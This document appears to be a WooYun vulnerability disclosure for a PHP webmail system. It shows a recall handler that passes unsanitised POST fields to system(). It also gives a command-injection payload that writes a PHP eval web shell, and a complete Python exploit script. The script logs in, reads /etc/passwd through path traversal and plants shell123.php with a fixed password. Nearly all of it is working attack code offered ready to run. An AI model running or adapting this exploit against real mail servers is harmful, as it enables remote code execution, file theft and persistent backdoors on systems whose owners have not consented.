WooYun.org

if($_GET['exec'] == 'recall'){ // 撤回邮件
	$user		= str_replace('\\','\\\\',$_POST['user']);
	$messageid	= str_replace('\\','\\\\',$_POST['messageid']);
	system(HM_SHELL."Mail_recall.sh '".$user."' '".$messageid."' '".$onlineip."' >null &");
	unset($_SESSION['H_MAILS']['Sent']);echo 'ok';exit;
}

http://mail.xxx.com.cn/src/ajaxserver.php?exec=recall
POST: user=1'|echo '<?php eval($_POST[123]); ?>'>/var/www/newmail/shell.php #&messageid=1

import requests
import sys
if len(sys.argv) < 4:
	print 'usage:python fuck.py http(s)://target:port/ <username> <password>'
	print 'example:python fuck.py http://mail.test.com:80/ admin admin'
	sys.exit(0)
else:
	target = sys.argv[1]
	if not target.endswith('/'):
		target += '/'
	username = sys.argv[2]
	password = sys.argv[3]
	sessionid = ''
def login(target,username,password):
	login_request = ''
	global sessionid
	domain = target[(target.index('.')+1):(target.index(':',6))]
	print 'domain=' + domain
	login_url = target + 'index.php'
	post_data = 'txtname=' + username + '&domain=' + domain + '&txtpwd=' + password + '&languages=zh-cn&button=%E7%99%BB+%E5%BD%95'
	try:
		login_request = requests.post(login_url,post_data,allow_redirects=False,verify=False,timeout=3)
		if login_request.status_code == 302:
			print 'login succeeded'
			sessionid = login_request.cookies['PHPSESSID']
			return sessionid
		else:
			print 'login failed,please check username and password'
			return False
	except Exception,e:   
		print Exception,":",e
		return False
def check(target,sessionid):
	check_request = ''
	url = target + 'src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd'
	request_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
	try:
		check_request = requests.get(url,headers=request_header,verify=False,timeout=3)
		if 'root:x:0:0:root:/root:/bin/bash' in check_request.text and check_request.status_code == 200:
			print 'target is vulnerable\r\n'
			# print 'the content of file \'/etc/passwd\'\r\n'
			# print check_request.text
			return True
		else:
			print 'target is not vulnerable'
			return False
	except Exception,e:   
		print Exception,":",e
		return False
def getshell(target,sessionid):
	getshell_request = ''
	fuckurl = target + 'src/ajaxserver.php?exec=recall'
	getshell_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}
	getshell_data = 'user=1\'|echo \'<?php eval($_POST[123]); ?>\'>/var/www/newmail/shell123.php #&messageid=1'
	# print getshell_data
	try:
		getshell_request = requests.post(fuckurl,getshell_data,headers=getshell_header,allow_redirects=False,verify=False)
		if (requests.get(target + 'shell123.php',verify=False).status_code == 200):
			print 'getshell succeeded,address:' + str(target + 'shell123.php') + ' password:123'
		else:
			print 'getshell failed!'
	except Exception,e:   
		print Exception,":",e
		return False
if __name__ == '__main__':
	if (login(target,username,password)):
		print 'sessionid=' + sessionid
		if(check(target,sessionid)):
			print 'target is vulnerable to directory transversal'
		else:
			print 'target is not vulnerable to directory transversal'
		print 'trying to getshell,please wait'
		getshell(target,sessionid)